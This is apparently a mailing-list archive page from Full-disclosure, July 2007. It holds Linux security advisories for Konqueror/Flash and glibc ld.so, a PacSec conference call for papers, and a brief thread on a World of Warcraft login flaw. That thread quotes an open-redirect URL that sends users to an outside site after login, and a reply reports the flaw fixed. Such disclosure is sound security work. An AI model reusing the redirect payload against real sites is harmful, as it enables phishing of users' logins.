Damn it I hate it when other people are right...

On 7/3/07 2:20 PM, secure poon [EMAIL PROTECTED] wrote:
> Old as in, I heard about it June 21, 2007 when the story surfaced... you are now enlightening us a whole week and a half later..
Re: [Full-disclosure] Worldofwarcraft.com - Redirection
Fixed.

--

kefka wrote:
> https://www.worldofwarcraft.com/login/login?service=http://kefkahacks.net/
> User will be redirected once they login.
[Full-disclosure] [ MDKSA-2007:138 ] - Updated kdebase packages fix Flash Player interaction vulnerability
Mandriva Linux Security Advisory MDKSA-2007:138
http://www.mandriva.com/security/

Package : kdebase
Date: July 3, 2007
Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0

Problem Description:

An issue with the interaction between the Flash Player and the Konqueror web browser was discovered, which could lead to key presses leaking to the Flash Player instead of to the browser. This only affects users who have actually installed the Adobe Flash Player plugin. Updated packages have been patched to prevent this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2022

Updated Packages:
[Full-disclosure] [ GLSA 200707-04 ] GNU C Library: Integer overflow
Gentoo Linux Security Advisory GLSA 200707-04
http://security.gentoo.org/

Severity: Normal
Title: GNU C Library: Integer overflow
Date: July 03, 2007
Bugs: #183844
ID: 200707-04

Synopsis
========

An integer overflow in the dynamic loader, ld.so, could result in the execution of arbitrary code with escalated privileges.

Background
==========

The GNU C library is the standard C library used by Gentoo Linux systems. It provides programs with basic facilities and interfaces to system calls. ld.so is the dynamic linker which prepares dynamically linked programs for execution by resolving runtime dependencies and related functions.

Affected packages
=================

     Package         /  Vulnerable  /  Unaffected
    ----------------------------------------------
  1  sys-libs/glibc      < 2.5-r4       >= 2.5-r4

    # Package 1 only applies to x86 users.

Description
===========

Tavis Ormandy of the Gentoo Linux Security Team discovered a flaw in the handling of the hardware capabilities mask by the dynamic loader. If a mask is specified with a high population count, an integer overflow could occur when allocating memory.

Impact
======

As the hardware capabilities mask is honored by the dynamic loader during the execution of suid and sgid programs, in theory this vulnerability could result in the execution of arbitrary code with root privileges. This update is provided as a precaution against currently unknown attack vectors.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-libs/glibc-2.5-r4"

References
==========

  [ 1 ] CVE-2007-3508
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3508

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200707-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[Full-disclosure] PacSec 2007 Call For Papers (Nov. 29/30, deadline July 27)
PacSec CALL FOR PAPERS

World Security Pros To Converge on Japan

TOKYO, Japan -- To address the increasing importance of information security in Japan, the best known figures in the international security industry will get together with leading Japanese researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks will be presented at the fifth annual PacSec conference to be discussed.

The PacSec meeting provides an opportunity for foreign specialists to be exposed to Japanese innovation and markets and collaborate on practical solutions to computer security issues. In a relaxed setting with a mixture of material bilingually translated in both English and Japanese the eminent technologists can socialize and attend training sessions.

Announcing the opportunity to submit papers for the PacSec 2007 network security training conference. The conference will be held November 29-30th in Tokyo. The conference focuses on emerging information security tutorials - it will be a bridge between the international and Japanese information security technology communities.

Please make your paper proposal submissions before July 27th, 2007. Slides for the papers must be submitted by October 1st 2007. The conference is November 29th and 30th 2007, presenters need to be available in the days before to meet with interpreters.

Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accommodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers, and speaking background to secwest07 [at] pacsec.jp . Tutorials are one hour in length, but with simultaneous translation should be approximately 45 minutes in English, or Japanese. Only slides will be needed for the October paper deadline, full text does not have to be submitted.
The PacSec conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and education for a technical audience.

The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products.

Paper proposals should consist of the following information:

1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax).
2) Employer and/or affiliations.
3) Brief biography, list of publications and papers.
4) Any significant presentation and educational experience/background.
5) Topic synopsis, Proposed paper title, and a one paragraph description.
6) Reason why this material is innovative or significant or an important tutorial.
7) Where else has this material been presented or submitted?
8) Optionally, any samples of prepared material or outlines ready.

Please forward the above information to secwest07 [at] pacsec.jp to be considered for placement on the speaker roster.

cheers,
--dr

P.s. Some other dates of interest are announced:

CanSecWest 2008 March 19-21 see http://cansecwest.com
EUSecWest 2008 May 21/22 see http://eusecwest

P.P.S.
Also as a friendly reminder, CCC Camp is Aug 8-12 2008, see http://events.ccc.de/camp/2007/Intro (Hi Julia et al...)

Happy Independence Day and Canada Day,

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan November 29/30 - 2007 http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp